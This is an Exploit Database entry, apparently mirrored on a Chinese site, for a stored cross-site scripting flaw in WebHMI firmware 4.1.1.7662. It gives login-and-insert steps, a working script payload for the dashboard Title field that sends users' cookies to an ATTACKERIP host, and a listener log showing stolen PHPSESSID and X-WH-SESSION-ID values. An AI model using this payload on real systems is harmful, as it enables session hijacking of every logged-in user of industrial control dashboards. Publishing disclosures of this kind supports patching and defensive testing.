WebHMI 4.1 – Stored Cross Site Scripting (XSS) (Authenticated)

• Exploit Database
• 111 阅读

• 作者： Antonio Cuomo
  日期： 2022-02-23
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/50785/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31

  # Exploit Title: WebHMI 4.1 - Stored Cross Site Scripting (XSS) (Authenticated) # Date: 04/01/2022 # Exploit Author: Antonio Cuomo (arkantolo) # Vendor Homepage: https://webhmi.com.ua/en/ # Version: WebHMI Firmware 4.1.1.7662 # Tested on: WebHMI Firmware 4.1.1.7662   #Steps to Reproduce   1. Login to admin account   2. Add a new register or create new dashboard insert payload   <script>var i=new Image;i.src="http://ATTACKERIP/?"+document.cookie;</script>   in Title field and save.   # Dashboard section impact instantly all logged users.   #Listener log: GET /?PHPSESSID=acaa76374df7418e81460b4a625cb457;%20i18next=en;%20X-WH-SESSION-ID=8a5d6c60bdab0704f32e792bc1d36a6f HTTP/1.1 Host: 192.168.0.169:8080 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8 Sec-GPC: 1 Referer: http://192.168.0.153/ Accept-Encoding: gzip, deflate Accept-Language: it-IT,it;q=0.9,en-US;q=0.8,en;q=0.7